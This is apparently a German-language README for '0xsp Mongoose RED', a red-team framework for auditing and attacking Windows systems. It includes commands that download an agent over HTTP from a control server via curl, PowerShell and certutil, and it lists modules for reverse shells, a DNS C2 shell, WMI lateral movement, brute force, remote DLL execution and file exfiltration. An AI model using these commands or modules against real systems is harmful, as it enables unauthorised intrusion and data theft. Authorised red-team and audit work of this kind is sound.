
Ein einzigartiges Framework für Cybersicherheitssimulation und Red-Teaming-Operationen, Windows-Audit auf neuere Schwachstellen, Fehlkonfigurationen und Privilegieneskalationsangriffe, Nachahmen der Taktiken und Techniken eines fortgeschrittenen Gegners in einem Netzwerk.
Unterstützen Sie das Projekt für die kontinuierliche Entwicklung (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)
Aktuelle Version 2.2.0
Die 0xsp Mongoose RED Version wird bereitgestellt, um Ihre Anforderungen während der Cybersicherheitssimulation zu unterstützen. Mit dieser Version können Sie ein Windows-Betriebssystem auf Systemschwachstellen, Fehlkonfigurationen und Privilege-Escalation-Angriffe überprüfen und die Taktiken und Techniken eines fortgeschrittenen Angreifers in einem Netzwerk replizieren.
Mit Node.js-Unterstützung für die Webanwendungs-API wird die Installation und Anpassung in kurzer Zeit viel einfacher. Der Windows-Sensor-Agent kommuniziert mit der Anwendungs-API, um Ergebnisse zu übertragen und Befehle als bidirektionale Technik zu empfangen.
Der Agent kann Windows-Exploits mithilfe der Module Windows Update API und Exploit Database Definitions erkennen und identifizieren. Die neue Version erkennt auch die folgenden Schwachstellen:
git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose
cd 0xsp-mongoose/
npm install
node index.js
Standard-Anmeldeinformationen:
touch temp.txt
python3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP
#example 1
curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
#example 2
powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
#example 3
certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe
-s --Windows-Dienste und installierte Treiber abrufen.
-u --Informationen über Benutzer, Gruppen und Rollen abrufen.
-c --Verbundene Treiber nach sensiblen Konfigurationsdateien anhand der Erweiterung durchsuchen.
-n --Netzwerkinformationen, Netzwerkschnittstellen, Verbindungsdetails abrufen.
-w --Beschreibbare Verzeichnisse auflisten, Zugriffsberechtigungen prüfen, geänderte Berechtigungen.
-i --Windows-Systeminformationen, Sitzungen, Prüfung auf immer erhöhte Rechte auflisten.
-l --In einer beliebigen Datei nach einer bestimmten Zeichenfolge suchen, z. B.: agent.exe -l c:\ password *.config.
-o --Host-Adresse der NodeJS-Anwendung angeben, Sie können auch srvhost verwenden.
-p --Installierte Software, ausgeführte Prozesse, Aufgaben auflisten.
-e --Kernel-Inspektionstool, das bei der Suche in Tool-Datenbanken nach Windows-Kernel-Schwachstellen hilft.
-x --Passwort zur Autorisierung Ihrer Verbindung mit der NodeJS-Anwendung.
-d --Dateien direkt auf den Zielcomputer herunterladen.
-t --Dateien vom Zielcomputer in die NodeJS-Anwendung hochladen.
-spooler --Einzelnen Host oder Liste von Hosts auf mögliche CVE-2021-1675 scannen (z. B. -spooler -srvhost oder -spooler -hosts).
-m --Alle bekannten Scan-Typen zusammen ausführen.
[!] RED-TEAMING-TAKTIKEN ABSCHNITT
-r --Reverse-Shell mit einem bestimmten Konto starten.
-lr --Technik für laterale Bewegung mittels WMI (z. B. -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip).
-nds --Netzwerkerkennung und Freigabe-Aufzählung.
-dns --Interaktive DNS-C2C-Shell herstellen.
-cmd --Befehle über HTTP-Shell übertragen.
-interactive --Interaktiven Modus starten (z. B. Plugins laden usw.).
-username --Identitätsauthentifizierung für bestimmte Angriffsmodule.
-password --Identitätsauthentifizierung für bestimmte Angriffsmodule.
-host --Remote-Host identifizieren, gegen den ein Angriff durchgeführt werden soll.
-srvhost --Remote-Host der NodeJS-Anwendung festlegen.
-bf --Brute-Force-Modul für lokale Benutzer / Domänenbenutzer.
-import --DLL-Datei lokal importieren und ausführen.
-remote --DLL-Datei von einem Remote-Host importieren und ausführen.
https://0xsp.com/security%20dev/0xsp-mongoose-red
Abonnieren Sie den folgenden Kanal, um benachrichtigt zu werden, wenn neue Tutorials und Tricks für 0xsp veröffentlicht werden. https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg